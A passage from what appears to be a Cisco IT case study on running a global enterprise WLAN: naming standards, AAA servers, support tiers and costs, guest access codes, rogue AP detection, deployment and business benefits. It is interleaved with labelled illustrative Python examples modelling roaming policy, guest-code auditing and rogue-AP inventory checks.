the roaming and avoids flip-flopping between access points, which in turn greatly assists in
troubleshooting and predicting client behavior.
The policy for 802.11g cells is to permit data speeds as high as possible, but never less than 802.11b
(11 Mbps). This results in the ability of newer 802.11g clients to associate with the latest model 802.11g
access points at higher than 11-Mbps speeds in some circumstances. However, association rates at
lower than 11 Mbps are never permitted.
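The Roaming and Radio Cell Architecture discussions above describe a client policy (stay on the current AP until its signal falls below a threshold or retries pile up) and the reason for it (every reassociation costs a reauthentication against the AAA servers, and flip-flopping at a cell boundary multiplies that load). The following Python simulation is an added example, not code from the book, from Cisco, or from the ACU; it replays a constructed RSSI trace of a client walking along the boundary between two cells under a naive "always strongest AP" policy and under the threshold policy, and counts the reauthentications each causes. The threshold, retry limit, AP names and trace values are assumptions chosen for illustration.

```python
"""Roam-policy simulation for an overlay WLAN (added example; not the book's
code nor Cisco ACU logic).

Replays a constructed RSSI trace of a client walking along the boundary of two
cells (AP names follow the book's naming standard) under two policies:
  * naive: reassociate whenever another AP is stronger
  * threshold: reassociate only when the current AP's signal drops below a
    threshold or the retry count hits a limit, as the text describes
Every reassociation after the first is a roam that triggers a reauthentication
against the AAA server, so the length of the association list is what matters.
Threshold, retry limit and trace values are assumptions.
"""
from typing import Dict, List

ROAM_RSSI_THRESHOLD_DBM = -75   # assumed: roam only once the current AP is weaker than this
MAX_RETRIES_BEFORE_ROAM = 3     # assumed: or once this many consecutive retries occur

# Constructed trace: {AP name: RSSI in dBm} per sample, plus retries toward the current AP.
CONSTRUCTED_TRACE: List[dict] = [
    {"rssi": {"NYC-AP2c": -60, "NYC-AP2d": -80}},
    {"rssi": {"NYC-AP2c": -66, "NYC-AP2d": -65}},  # neighbours nearly equal:
    {"rssi": {"NYC-AP2c": -65, "NYC-AP2d": -66}},  # the naive policy flip-flops here
    {"rssi": {"NYC-AP2c": -67, "NYC-AP2d": -64}},
    {"rssi": {"NYC-AP2c": -70, "NYC-AP2d": -62}},
    {"rssi": {"NYC-AP2c": -78, "NYC-AP2d": -58}},  # AP2c now below the threshold
    {"rssi": {"NYC-AP2c": -85, "NYC-AP2d": -55}},
    {"rssi": {"NYC-AP2c": -70, "NYC-AP2d": -72}, "retries": 4},  # link to AP2d stalls
]


def strongest(rssi: Dict[str, int]) -> str:
    """Name of the AP with the highest RSSI in this sample."""
    return max(rssi, key=rssi.get)


def naive_policy(trace: List[dict]) -> List[str]:
    """Associate to the strongest AP at every sample (no hysteresis)."""
    associations: List[str] = []
    current = None
    for sample in trace:
        best = strongest(sample["rssi"])
        if best != current:
            associations.append(best)
            current = best
    return associations


def threshold_policy(trace: List[dict],
                     threshold: int = ROAM_RSSI_THRESHOLD_DBM,
                     max_retries: int = MAX_RETRIES_BEFORE_ROAM) -> List[str]:
    """Stay associated unless the current AP is weak or frames keep failing;
    only then pick the strongest AP."""
    associations: List[str] = []
    current = None
    for sample in trace:
        rssi = sample["rssi"]
        retries = sample.get("retries", 0)
        must_scan = (current is None or current not in rssi
                     or rssi[current] < threshold or retries >= max_retries)
        if must_scan:
            best = strongest(rssi)
            if best != current:
                associations.append(best)
                current = best
    return associations


def reauthentications(associations: List[str]) -> int:
    """Every association after the first is a roam that requires reauthentication."""
    return max(len(associations) - 1, 0)


if __name__ == "__main__":
    for name, policy in (("naive", naive_policy), ("threshold", threshold_policy)):
        assoc = policy(CONSTRUCTED_TRACE)
        print(f"{name:9s} associations={assoc} reauthentications={reauthentications(assoc)}")
```

On this trace the naive policy reassociates four times and the threshold policy twice; the difference is pure AAA load and, for voice clients, audible stutter, which is why the client threshold and the modest 15 percent cell overlap are tuned together.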

Global Naming Standards


Cisco uses a clear, concise, and consistent naming standard for all access points. This standard aids
greatly in troubleshooting and also provides users and network engineers with useful information about
their current access point.
The naming standard is as follows:
<site name>-AP<floor><AP letter>.cisco.com
For example, for the third access point on the second floor of a New York office, the access point name
could be NYC-AP2c.cisco.com.
Cisco IT has found that a consistent naming standard allows for easier management.

Cisco Aironet Access Points


When originally deployed, the Cisco Aironet 350 Series Access Point was selected as the standard access
point. The Cisco Aironet 350 Series was the most advanced, fully featured wireless access point
available. It supported the 802.11b protocol standard (the most advanced at that time), which provides
data rates of up to 11 Mbps. The Cisco Aironet 350 Series also supported inline Power over Ethernet
(PoE), which greatly simplifies installation and reduces costs by eliminating the need for separate,
dedicated power cabling to the main supply.
PoE allows the access point to draw power through its Ethernet cable, from the switch to which it is
connected. In some circumstances, where certain sites did not have switches that supported PoE, Cisco
IT used standalone "power injectors." These devices sit inline between the network switch and the
access point and "inject" DC power into the cable. This allowed Cisco IT to continue using PoE at all
locations, even where they had older switches that did not provide PoE or that did not have sufficient
power capacity to power all the access points required. Figure 9-3 shows how a power injector sits in
between the access point and the switch.

Figure 9-3. Using Power Injectors to Provide PoE When It Is Not Available
from the Switch

Today, Cisco IT is expanding and enhancing its initial Cisco Aironet 350 Series deployments by installing
Cisco Aironet 1000, 1100, and 1200 Series access points. These access points support new 802.11
standards and additional feature enhancements and options for modular and flexible WLAN deployments,
including the centralized, controller-based architecture or the distributed autonomous access point
architecture. At the time of writing, approximately 25 percent of the access points were the 1200 series.
This percentage will rise to 100 percent with the NexGen WLAN.

Cisco Secure Access Control Server (ACS)


The Cisco Secure ACS is used as the standard AAA server for the global WLAN and for other recently
introduced services such as 802.1x-based port authentication for wired Ethernet ports in public areas
and Network Access Control (NAC), part of the Cisco Self-Defending Network security strategy. Pairs of
Cisco Secure ACSs were deployed at strategic locations worldwide.
The value of using a globally distributed AAA architecture instead of a single AAA server was highlighted
by the WLAN deployment. Because of the greater load that a WLAN creates for AAA, due to
authentications and reauthentications (as the client device roams from AP to AP), it was important to
ensure that all users did not have to rely upon a single, centralized server. This would have introduced
unacceptable delays for users in geographically remote areas. As such, at 13 different locations around
the world, Cisco placed two ACS servers, in a load-balanced configuration, that served as AAA servers
for that local geographical region.
The ACS servers are fully integrated with the Cisco Active Directory domain structure, enabling a single
sign-on (SSO) capability. Effectively, AD user credentials are used not only for access to their laptops
and wired network but also to provide transparent authentication to the wireless network. SSO has
greatly reduced the client impact for users and has helped ensure a common, user-friendly experience
across platforms and transport media. Users need only remember their normal ID and password for
access to their laptop, the wired network, and the wireless network, and they only have to enter their
credentials once each session regardless of the transport medium they are using.

Network Management
To date, more than 3100 Cisco Aironet access points have been deployed worldwide, supporting more
than 50,000 users. This includes over 37,000 full-time Cisco employees, as well as over 10,000
temporary, contractor, and vendor staff. A WLAN as widely used as this requires a robust management
capability. Because a dedicated wireless management system was not available in 2000, the Cisco
wireless network was managed through EMAN, an internally developed web-based enterprise-management
framework. Today, Cisco IT also uses the CiscoWorks WLSE, a Cisco appliance for
managing WLAN deployments.

Client Management
Client management is a challenging area, and Cisco has implemented robust business processes to
address it. Before 2004, all client devices were based upon Cisco-manufactured client adaptors, radios,
and devices. However, the Cisco Client Extensions (CCX) is a technology licensing scheme that allows
third-party manufacturers to produce equipment that supports Cisco value-added capabilities. With CCX,
many third-party client devices and platforms have been introduced within the production environment.
To address the resulting diversity of clients, Cisco made the decision to adopt third-party wireless software for all platforms.
This adoption ensures that a common software application is used for all operating systems (Windows
2000, Windows XP, Linux, MacOS, and so on), regardless of the particular adaptor used in the relevant
laptop (Cisco adaptors, Intel Centrino laptops, Macintosh PowerBooks, and so on).
The third-party supplicant also provides a consistent management toolset to allow for centralized profile
management and configuration.
A centralized client management solution is also used to facilitate software distribution and updates.
Service dashboards, which are internal intranet websites, also provide service information, user
communication, software, and self-service configuration utilities for all users. All Cisco staff can use
dashboards for instructions on how to manually configure or update their systems. Because dashboards
are based on standard HTML pages, they are platform agnostic and suitable for all platforms and clients
that support HTTP.

Service and Support


Network devices, systems, and applications on the Cisco global network are managed according to levels
of impact to the business. Service or support levels fall into four categories:
Priority 1 (P1): Immediate and severe business impact including revenue loss (actual, not
postponed); inability to make or ship product; inability to develop code or product; inability to
meet contractual, legal, or government-imposed processing deadlines; impact to external Cisco
customers, partners, or supplier processes with negative implications for relations, market
perception, or revenue; or engineering groups unable to work on a critical customer build or fix
other critical account issues.
Priority 2 (P2): Adverse business impact including the inability of an organization (or
organizations) within Cisco to perform daily operations such that it is essentially idle; or direct and
critical impact to executives within the company, or to development, test, disaster-recovery, or
staging environment for a P1 service or system.
Priority 3 (P3): Low business impact including the inability of multiple users to perform their daily
tasks such that they are essentially idle; or impact to a single user under an approved, documented
Service Level Agreement (SLA) requirement, or to a development, test, disaster-recovery, or
staging environment for a P2 service or system.
Priority 4 (P4): Minor or no business impact to Cisco such as a question or new service request, or
a problem that keeps one employee from performing part of a job function.
Within this support-level structure, Cisco Secure ACSs are managed as a P1 device because they are
critical not only for WLAN access, but also for NAC, an element of the Cisco Self-Defending Network
security strategy. The wireless network was originally managed as a P4 because it was considered a
secondary network to the wired network. However, because of widespread adoption and usage within
Cisco, support for the WLAN has become equivalent to P2. Cisco envisions that the NexGen WLAN, based
upon more advanced and intelligent wireless networking technologies, will be formally supported on a P2
basis.

Cisco Support Team


Cisco has a four-tier support model, as follows:
Tier 1: Frontline Global Technical Resource Center (GTRC) This is equivalent to a standard
internal helpdesk. Agents are familiar with the most common problems and work from prepared
scripts and troubleshooting guides. Each GTRC hub has a nominated wireless LAN expert who is
more familiar with the solution than his colleagues.
Cases that are handled at this level are usually client configuration issues or the initial reports of
service outages. Problems that cannot be solved by the GTRC are escalated to Tier 2 support.
Tier 2: Cisco IT WLAN network operations team These Cisco IT engineers are responsible for
ongoing network and infrastructure support. The WLAN subteam is made up of engineers who
usually have several years of experience supporting the solution and, in many cases, were directly
involved in the original deployment and design. The IT WLAN network operations team has access
to the access points, switches, routers, AAA servers, and WLAN controllers that make up the
solution. This team also includes virtual members from the Cisco dedicated security organization
and hosting teams (responsible for the AAA and Active Directory servers).
Cases that are handled at this level are usually AP or controller configuration issues, service outage
problems, requests for enhanced coverage, and so on. Problems that the IT WLAN network
operations team cannot solve are escalated to Tier 3 support.
Tier 3: Cisco IT WLAN architecture team The IT WLAN architecture team is made up of several
senior design engineers and solutions architects. Members of this team designed the original
solution and have continued their work on evolutionary change and development over the past five
years. This team holds the most technical, business, security, and program management
experience on the Cisco solution.
Cases that are handled at this level are usually fundamental design or architecture issues, requests
for new services or capabilities, and new product or solution implementation. If a problem cannot
be handled at this level, it is usually a result of a product bug and is escalated to Tier 4 support.
This is a rare occurrence because most issues that are escalated this high relate to solution
development rather than bug fixes.
Tier 4: Technical Assistance Center (TAC) and Wireless Networking Business Unit
(WNBU) The TAC is the top level of support within Cisco and for Cisco customers. Cisco IT can
also escalate directly to the WNBU within Cisco. Only officially noted bugs are escalated to this
level.
A team of three and a half full-time equivalent (FTE) staff makes up the Tier 2 IT WLAN network
operations staff. Note that this effort is spread over several people in several countries but that the
combined total is equivalent to 3.5 FTE.
A team of two and a half FTE makes up the Tier 3 IT WLAN architecture team. This includes the global
program manager responsible for enterprise wireless strategy and architecture.

Cost of Support
Cisco prices each GTRC support call at US$25 per call. This results in an annualized cost of frontline Tier 1
support of US$318,900.
Cisco budgets US$120,000 per annum as the fully loaded cost of an FTE. This cost includes salary,
assets, workplace costs, business costs, and so on, and is not indicative of salary alone. This results in
an annualized cost of second-line Tier 2 support of US$420,000.
Because of the nature of the Cisco business and the maintenance of a Tier 3 architecture team, Cisco
does not include these costs in the day-to-day annualized support costs. Cisco believes the maintenance
of a dedicated architecture team is not indicative of a typical enterprise because not all corporations are
based in the networking industry.
This results in a total annualized cost of support as reflected in Table 9-1.

Table 9-1. Cost of Support

Level of Support                               Cost
Frontline support                              $318,900
Second-/Third-line support                     $420,000
Total annual support costs                     $738,900
Annual support cost per user (50,000 users)    $14.77

Enhanced Services
Several enhanced services are available today, including support for wireless voice services and global
guest networking. The enhanced services are facilitated by the use of several SSIDs and wireless VLANs,
with differing security settings based upon the target devices. Figure 9-4 displays the various SSIDs
used by Cisco to provide enhanced services, such as wireless voice and guest WLAN networking. Two
production SSIDs are also used with different encryption methods: one with WPA and one with Cisco
TKIP. This ensures that older devices that cannot support WPA are still provided with an SSID that they
can use.

Figure 9-4. SSID Architecture

Wireless Voice Services


Wireless voice services are provided to Cisco employees by the use of the Cisco Wireless IP Phone 7920,
a key component of the Cisco AVVID Wireless Solution, and of Cisco IP Communicator, a Windows-based
softphone application.

The Cisco Wireless IP Phone 7920 is a WiFi-based (802.11b) phone that offers employees the ability to
carry their extension with them as they move about Cisco premises. Many highly mobile users have
adopted this device because it allows them to keep abreast of their voice communication services, even
when away from their desk.
Cisco IP Communicator is similar in concept to the Cisco Wireless IP Phone 7920, but it uses a virtual
software-based IP phone that is set up and configured on the user's laptop. This allows users to access
their extension, regardless of location and even when outside of Cisco sites by the use of VPN
technology.
Wireless voice services are provided by a dedicated SSID and wireless VLAN, configured with support for
QoS (802.11e and WMM, or Wireless MultiMedia, protocols) and fast secure Layer 2 roaming (provided
by Cisco Centralized Key Management [CCKM]).

Wireless Guest Networking


Wireless Guest Networking services are provided by Cisco IT to enable visitors to access the Internet
while at Cisco sites. The solution is based upon a combination of the existing WLAN infrastructure, the
Cisco Building Broadband Services Manager (BBSM), and an internally developed web portal for
employee self-service access code generation.
All access points within the Cisco global network broadcast a guest networking SSID, which is configured
with open authentication and no encryption to ensure that any client device can associate. When a visitor
associates to the guest networking SSID and launches his browser, his HTTP session is automatically
routed to a welcome page and portal. The visitor must read and accept the Cisco acceptable use policy
and enter a preprovisioned access code. Upon validation, the visitor is then rerouted to the Cisco
demilitarized zone (DMZ) via a GRE tunnel to protect the production network. Effectively, from the
guest's point of view, he is immediately provided with seamless Internet access, and he has no
awareness of the intervening and transporting network between his location and the DMZ.

Note
DMZ is originally a military term denoting a semi-safe area around a base or border where
military (and therefore enemy) activity is controlled. In the networking world, this term was
adopted to describe the area of an enterprise network that lies between the Internet and the
internal enterprise network. It is where the enterprise typically places its security apparatus
and gateways to the Internet. A firewall or a router usually protects this zone.
GRE is a tunneling protocol developed by Cisco Systems that can encapsulate a wide variety of
protocol packet types inside IP tunnels.

Access codes are required to satisfy the Cisco requirement for auditing and IT forensics. Were a visitor
to undertake illegal or unfriendly activity, the behavior could be tracked back to a particular IP address,
which in turn is associated with a particular access code. Because each access code is generated on an
as-needed basis and associated with a particular visitor, Cisco security and legal departments can
ascertain who was using a particular IP address at any particular time.

Access control, and the use of access codes, is provided by the BBSM. However, to avoid unnecessary
administrative overhead, Cisco IT developed an internal tool to allow Cisco users and staff to generate
access codes for their own visitors. Effectively, Cisco has empowered its own staff with the ability to
create access codes when they expect visitors. This removes unnecessary support burden from IT and
administrative staff.
Access codes are therefore available for creation at the internal intranet page hotspot.cisco.com. Any
Cisco employee can access this page and, after authenticating oneself as a Cisco employee, generate
one or more access codes. Figure 9-5 illustrates how a Cisco staff member can generate the access
codes, which are in turn provisioned on the BBSM, which in turn acts as an access portal to the Internet
for the guest.

Figure 9-5. Cisco Guest Wireless Networking Solution


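The guest networking flow above has three parts that together give Cisco its audit trail: an employee generates a code for an expected visitor, the portal admits a client only after the acceptable use policy is accepted and the code validates, and every admission ties an IP address to that code for a period of time so that security or legal staff can later resolve (IP address, time) to a visitor and sponsor. The Python model below is an added example and is not the Cisco hotspot tool, the BBSM, or any code from the book; it shows the lifecycle end to end, including the case the paragraph on forensics implies but does not spell out, where DHCP hands the same IP address to a second guest later in the day. Timestamps are epoch seconds, and the validity window, code length and code alphabet are assumptions.

```python
"""Guest access-code lifecycle (added example; not the Cisco hotspot tool or BBSM).

Sponsor generates a code for a named visitor; the portal admits a client only
after the AUP is accepted and the code validates; every admission is recorded
as a lease of an IP address so that (IP, time) can be resolved to code,
visitor and sponsor for audit. Timestamps are epoch seconds (ints); validity
window, code length and alphabet are assumptions.
"""
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

CODE_ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"  # assumed: no 0/O or 1/I lookalikes
DEFAULT_VALIDITY_S = 24 * 3600                      # assumed: a code lives one day


@dataclass
class AccessCode:
    code: str
    sponsor: str      # employee who generated the code
    visitor: str      # person the code was issued to
    created: int
    expires: int


@dataclass
class Lease:
    ip: str
    code: str
    start: int
    end: Optional[int] = None   # None while the guest is still online


def random_code(length: int) -> str:
    """Unpredictable code from the CSPRNG; not derivable from sponsor or time."""
    return "".join(secrets.choice(CODE_ALPHABET) for _ in range(length))


class GuestPortal:
    def __init__(self, validity_s: int = DEFAULT_VALIDITY_S,
                 code_source: Callable[[int], str] = random_code):
        self._codes: Dict[str, AccessCode] = {}
        self._leases: List[Lease] = []
        self._validity_s = validity_s
        self._code_source = code_source   # injectable so a test can be deterministic

    def generate_code(self, sponsor: str, visitor: str, now: int, length: int = 8) -> str:
        """Employee self-service step: one code per expected visitor."""
        code = self._code_source(length)
        while code in self._codes:          # avoid a collision with a live code
            code = self._code_source(length)
        self._codes[code] = AccessCode(code, sponsor, visitor, now, now + self._validity_s)
        return code

    def admit(self, code: str, ip: str, accepted_aup: bool, now: int) -> bool:
        """Portal step: AUP accepted and code valid, otherwise stay on the welcome page."""
        rec = self._codes.get(code)
        if not accepted_aup or rec is None or not (rec.created <= now < rec.expires):
            return False
        self.release(ip, now)               # DHCP may hand this IP to a later guest
        self._leases.append(Lease(ip, code, now))
        return True

    def release(self, ip: str, now: int) -> None:
        """Close the open lease on an IP (guest left, lease expired, or IP reused)."""
        for lease in self._leases:
            if lease.ip == ip and lease.end is None:
                lease.end = now

    def who_used(self, ip: str, at: int) -> Optional[AccessCode]:
        """Forensics lookup: which code (visitor and sponsor) held this IP at this time?"""
        for lease in self._leases:
            if lease.ip == ip and lease.start <= at and (lease.end is None or at < lease.end):
                return self._codes[lease.code]
        return None
```

The book does not say whether a code may be used more than once inside its validity window, so the model leaves codes reusable and relies on the lease history, not the code itself, for attribution; the lookup returns nothing for a time when no guest held the address, which is the answer an investigator should get rather than the nearest guess.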

Security
In 2000, during the initial deployment, the Cisco security architecture was based upon a combination of
Cisco LEAP, for authentication, and Cisco Key Integrity Protocol (CKIP), for data integrity (encryption).
However, as the industry, solutions, and threats evolved, Cisco further strengthened the security of its
internal WLAN.
In 2005, Cisco replaced LEAP with Extensible Authentication Protocol-Flexible Authentication via Secure
Tunneling (EAP-FAST). EAP-FAST further secures authentication by ensuring that all user credentials and
passwords are passed from the client to the authenticators via a strongly encrypted tunnel. For more
information about EAP-FAST, visit
http://www.cisco.com/en/US/netsol/ns339/ns395/ns176/ns178/netqa09186a00802030dc.html or visit
Cisco.com and search for the keyword EAP-FAST.
Additionally, and in line with Cisco IT's policy of adopting open, cross-industry standards (where
applicable and where Cisco does not provide enhanced value-added alternatives), WiFi Protected Access
(WPA) was adopted as the encryption protocol for data integrity.
The Wireless LAN Solution Engine (WLSE) provides radio-based rogue AP detection and has been
integrated into Cisco IT's help desk case generation system. Additionally, an internally developed tool is
used for network-based (that is, wired) scanning. This tool regularly scans Class C IP subnets, searching
for devices that satisfy certain criteria and may be rogue access points. Based upon so-called "TCP port
fingerprinting" and other holistic logic, the tool compares all devices it detects with the database of Cisco
IT installed access points. Where a device is not already listed as a Cisco IT device, it is flagged as
"interesting," and a case is automatically generated. This case, in turn, is routed to the Tier 2 support
team for investigation.
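The wired-side scan described above rests on two pieces of data hygiene that the chapter also covers: the access-point naming standard introduced under "Global Naming Standards" and an inventory of IT-installed access points against which every fingerprinted device is compared. The Python below is an added example and is not Cisco IT's internal scanning tool; it parses hostnames against the <site name>-AP<floor><AP letter>.cisco.com standard, applies a simple "looks like an access point" fingerprint to constructed scan records, and opens one case per device that matches the fingerprint but is absent from the inventory, which is exactly the "interesting" flag the text describes. The regular expression for the naming standard, the scan records, the inventory, the port criteria and the OUI values are all assumptions constructed for the example; a real tool would feed in live scan output and the real inventory.

```python
"""Wired-side rogue AP reconciliation (added example; not Cisco IT's internal tool).

Two checks: (1) parse hostnames against the book's
<site name>-AP<floor><AP letter>.cisco.com naming standard, and (2) run a
simple 'looks like an access point' fingerprint over scan results and open a
case for every match that is not in the IT-installed AP inventory. Scan
records, inventory, OUIs and port criteria are constructed assumptions.
"""
import re
from typing import Dict, List, NamedTuple, Optional

# Assumed regex for the naming standard: 2-5 upper-case site letters, a
# 1-2 digit floor number, one lower-case AP letter, in the cisco.com domain.
AP_NAME_RE = re.compile(
    r"^(?P<site>[A-Z]{2,5})-AP(?P<floor>\d{1,2})(?P<letter>[a-z])\.cisco\.com$")


class ApName(NamedTuple):
    site: str
    floor: int
    letter: str


def parse_ap_name(hostname: str) -> Optional[ApName]:
    """Return the parsed name, or None if the hostname violates the standard."""
    m = AP_NAME_RE.match(hostname)
    return ApName(m["site"], int(m["floor"]), m["letter"]) if m else None


class ScanRecord(NamedTuple):
    ip: str
    hostname: str          # reverse DNS result, "" if none
    open_ports: frozenset  # TCP ports the scanner found open
    oui: str               # first three MAC octets as seen in ARP


# Constructed fingerprint: small APs of the era answered on telnet and a web
# console; the OUI values are placeholders, not real vendor assignments.
AP_MGMT_PORTS = frozenset({23, 80})
AP_VENDOR_OUIS = frozenset({"AA:BB:01"})


def looks_like_ap(rec: ScanRecord) -> bool:
    """TCP port fingerprint plus vendor OUI, as the text describes in outline."""
    return AP_MGMT_PORTS <= rec.open_ports and rec.oui in AP_VENDOR_OUIS


def find_rogue_candidates(scan: List[ScanRecord], inventory: Dict[str, str]) -> List[dict]:
    """Flag AP-looking devices that are not in the inventory (IP -> hostname)
    as 'interesting' and return one case per device for the Tier 2 queue."""
    cases: List[dict] = []
    for rec in scan:
        if not looks_like_ap(rec):
            continue
        if inventory.get(rec.ip) == rec.hostname:
            continue                      # known, IT-installed access point
        reason = "not in AP inventory"
        if rec.hostname and parse_ap_name(rec.hostname) is None:
            reason += "; hostname violates naming standard"
        cases.append({"ip": rec.ip, "hostname": rec.hostname, "status": "interesting",
                      "reason": reason, "route_to": "Tier 2"})
    return cases


def inventory_name_violations(inventory: Dict[str, str]) -> List[str]:
    """Hygiene check on the inventory itself: names that break the standard."""
    return [name for name in inventory.values() if parse_ap_name(name) is None]


# Constructed sample data for one Class C sweep.
INVENTORY = {"10.1.2.10": "NYC-AP2c.cisco.com", "10.1.2.11": "NYC-AP2d.cisco.com"}
CONSTRUCTED_SCAN = [
    ScanRecord("10.1.2.10", "NYC-AP2c.cisco.com", frozenset({23, 80}), "AA:BB:01"),
    ScanRecord("10.1.2.11", "NYC-AP2d.cisco.com", frozenset({23, 80}), "AA:BB:01"),
    ScanRecord("10.1.2.57", "", frozenset({23, 80}), "AA:BB:01"),               # unnamed AP-like box
    ScanRecord("10.1.2.88", "printer-2f.cisco.com", frozenset({80, 9100}), "CC:DD:02"),
    ScanRecord("10.1.2.99", "nyc-ap2e.cisco.com", frozenset({23, 80}), "AA:BB:01"),  # "DIY" install
]

if __name__ == "__main__":
    for case in find_rogue_candidates(CONSTRUCTED_SCAN, INVENTORY):
        print(case)
```

Two of the five constructed devices are flagged: the unnamed box and the self-installed unit whose owner copied the naming pattern but not its case, which is the kind of "DIY" network the opening of this case study mentions. The printer answers on port 80 but not on the full management-port set, so it is left alone; in practice the fingerprint needs to be broad enough to catch other vendors' access points and still narrow enough that the Tier 2 queue is not flooded with printers.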

Deployment and Implementation


To facilitate the deployment, Cisco IT assembled a global program management team under the
direction of a global program manager. Representatives were selected from each of the four regions
worldwide: Americas, APAC (Asia Pacific), EMEA (Europe, Middle East, Africa), and SJ (San Jose
Headquarters).
Responsibility for deployment within each region was delegated to a regional project manager and local
team. Region-specific project managers determined and managed an implementation schedule within
their own region. Local teams communicated progress at a weekly global deployment meeting. Several
sites were deployed concurrently across and within regions. Serial installation by one global team might
have taken years. Instead, almost all sites were deployed within a four-month timeframe in 2000, with
the exception of India, which was delayed because of local regulatory issues with 802.11 standards.
The global program management team recognized that using Cisco employees exclusively to perform
WLAN installation tasks was not the most cost-effective use of resources. Instead, where possible,
vendors were hired for the bulk of the work. These vendors had to meet a minimum set of requirements
established by the global program management team. The local contractors had to have a previous
trusted relationship with Cisco and had to have wireless certified engineers. An emphasis on competitive
bidding helped to minimize capital investment. Each local team selected their contractors based on their
familiarity with the local market.

Site Survey
The global program management team established a guideline for the deployment process to be followed
worldwide. The first step in deployment was the site survey. A formal and well-defined site survey was
undertaken at each site, or on large campuses with several buildings with identical floorplans, at one
building only, with the same results being applied to each identical building.
In many locations, trusted vendors performed the site surveys, while in some locations, such as San
Jose, Cisco IT employees undertook the process themselves.

Cabling
After the site survey was complete, local contractors (different from the site survey firm) installed the
cabling and physically placed, secured, and connected the Cisco Aironet access points. Each access point
was provided with two cables: one for data connectivity and one for console access.

Access Point Configuration


After the access points were cabled and powered (via PoE), they were configured. Before distribution to
each site, the access points were preconfigured with a "generic" configuration that allowed Cisco IT to
connect and push the final production configuration. This was known as the staging phase, and it
allowed Cisco IT to preconfigure and update firmware before shipping equipment to each site. This
configuration was in compliance with the global design specifications established by the architecture
team. Most critical were the IP address, channel assignment, and transmit power settings. Using generic
and standardized access-point configurations helped to ensure consistent access-point settings across
the entire deployment, simplified troubleshooting, and provided Cisco IT with greater control of
individual access points.

Testing
Following configuration, the same contractor who performed the site surveys returned to conduct post-installation acceptance tests in each building. Dummy user accounts with limited access rights were
provided, which enabled the contractors to test basic WLAN authentication and services. The globally
consistent and clearly defined acceptance tests included the ability to roam from access point to access
point and transfer a file at a minimum designated speed. Tests also helped to ensure the correct overlap
between access point cells and verified that there were no dead spots.

Distribution of Wireless Network Cards and Instructions


At the time of the global WLAN deployment, distribution of Cisco Aironet 802.11b WLAN client adapters
(wireless cards) presented a significant challenge. Cisco had to smoothly distribute more than 35,000
wireless cards in a timely and controlled manner across 400 sites in approximately 100 countries. Not
only did the cards represent a significant percentage of the total program cost, but Cisco IT also needed
to update each card with the latest firmware before delivering it to each user. Furthermore, it was
important that the cards were not distributed to users until their sites were completed and had
successfully passed the post-installation acceptance test.
In most locations, the task of inventorying, verifying firmware level, and distributing cards and operating
instructions to users was performed during the staging phase and assigned to the same vendor that
performed acceptance tests. Cards were shipped to the local vendor's distribution center where the
correct firmware level would be verified or updated as appropriate. When vendors carried out the post-installation acceptance tests, they distributed the cards to local users, along with user instructions, FAQs
(Frequently Asked Questions), and introductory collateral from Cisco IT. Setting user expectations and
providing comprehensive information were critical to minimizing support calls.
Today, Cisco uses both Cisco Aironet access points and Cisco compatible client devices in its network.
Using these devices provides Cisco employees with a variety of licensed Cisco infrastructure innovations
and enhancements for its WLANs, including advanced enterprise-class security, extended air RF
management, and enhanced interoperability.

Ongoing Project Management and Process


Cisco maintains a full-time global solutions program manager for enterprise wireless strategy and
architecture. This individual is responsible for leading the IT WLAN architecture team (which also
provides Tier 3 support where necessary). The team meets on a weekly basis and discusses ongoing
solutions development and enhancement, operational issues, and any current projects in the wireless
technology domain.

Business Benefits of the Solution


Cisco IT believes that the global WLAN solution provides positive productivity benefits in excess of
US$50M per annum. Internal Cisco IT studies show average productive time savings of over 30 minutes
per day. However, to ensure a more conservative approach, Cisco has calculated the business value of
the WLAN on the assumption of 50 percent of users saving only 10 minutes per day.
Cisco Systems, Inc. commissioned an independent study on WLAN benefits in 2003. Based on a survey
of over 300 U.S. organizations with more than 100 employees, it was found that WLANs typically provide
average daily time savings (and therefore productivity) of 90 minutes. This in turn is equivalent to
US$14,000 per employee, per annum.[1]
Rather than adopting these figures (which would have resulted in projected savings of several hundred
million dollars when considering over 38,000 regular employees), Cisco IT took a considerably more
conservative and financially prudent approach.
First, Cisco calculated the cost of employee time, as follows:
230 work days per year
96,600 work minutes per year (7 hours per day)
Average cost of $120,000 per employee per year (salary, workplace resources costs, and so on)
120,000 / 96,600 = 1.2422
Average cost per work minute: $1.24 / minute
Cisco IT then calculated the benefits that would result if each employee were to save 10 minutes per
day. This resulted in a figure of over 100 million dollars:
10 minutes saved * $1.24 * 230 work days = $2,852 per employee
38,000 employees, productivity improvement =US$108,376,000
This figure assumes that every employee realizes the saving on every working day, so it is not a reliable
basis for a business case. To ensure financial prudence, Cisco IT therefore normalized the estimate downward,
assuming that only 50 percent of daily WLAN users save and use 10 minutes of productive time per day:
10 minutes saved * $1.24 * 230 work days = $2,852 per employee
19,000 employees * 2,852 = US$54,188,000
Experience, user reports, and observed behavior show that these figures err on the side of caution.
However, even with this statistically conservative and financially prudent approach, Cisco IT has shown
that the global WLAN solution not only paid for itself within six months of deployment but also has been
positively affecting the Cisco bottom line to the tune of tens of millions of dollars for the past five years.
Cisco IT expects this trend to continue as users' reliance on the WLAN increases and additionally
enhanced services are added to the solution.

What the Future Holds


Cisco IT is currently undertaking a major upgrade of the global WLAN. As the business has come to
realize the benefit of wireless connectivity, the WLAN is being redesigned from the bottom up, adopting
a proactive business value philosophy rather than a simple technology deployment approach. The team
has been tasked to tackle the wireless LAN in a holistic manner, taking into account not only new
products (such as the Cisco WLAN controllers and LWAPP access points), but also concepts such as fully
integrated security with the Cisco self-defending network security strategy, a converged management
solution, improved stability, and resilience in addition to data and voice capacity, outdoor coverage to
ensure seamless roaming on campus sites, and a raft of additional features, enhancements, and
evolutionary development.
The number of access points will be approximately doubled, improving the user-to-AP ratio from the
current 25:1 to approximately 14:1. This is essential for robust wireless voice services, increased
granularity in wireless rogue AP detection and intrusion detection, and greater wireless traffic load, all of
which are features and characteristics of Cisco's internal WLAN today.
This section describes other changes introduced by Cisco IT's NexGen WLAN:
Modular architecture
Enhanced security
Location-based services
Outdoor wireless

Modular Architecture: Centralized and Autonomous APs


Because of the large number of Cisco sites and their varying sizes (from large multibuilding campuses
with thousands of users to small, shared-tenancy sales offices with five or fewer staff), the Cisco WLAN
upgrade plan combines the Cisco centralized WLAN solution (based on LWAPP access points and WLAN
controllers) for large- and medium-sized sites with the Cisco distributed WLAN solution (based on
intelligent, IOS-based access points) for small and very small sites where local controllers are
